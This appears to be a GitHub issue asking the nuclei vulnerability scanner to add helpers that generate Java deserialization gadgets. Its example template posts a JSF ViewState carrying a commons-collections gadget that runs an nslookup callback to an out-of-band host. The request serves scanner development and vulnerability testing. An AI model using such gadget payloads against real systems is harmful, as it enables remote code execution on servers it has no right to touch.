### ISSUE TITLE
[feature] Add deserialization helpers to nuclei

### ISSUE THREAD

**Issue by Ice3man543** [projectdiscovery/nuclei#839]
**Is your feature request related to a problem? Please describe.**
Bugs for Deserialization in Java applications are pretty common in template form. We should provide helpers for generating common deserialization gadgets to nuclei.

An example use case
```yaml
raw: 
  -  |
    POST /index.faces;jsessionid=x HTTP/1.1
    Accept-Encoding: gzip, deflate
    Content-Length: 1882
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Host: 127.0.0.1:80
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
    Content-Type: application/x-www-form-urlencoded

    javax.faces.ViewState={{generate_java_gadget("commons_collection3.1", "nslookup {{interact.sh}}", "base64")}}
```
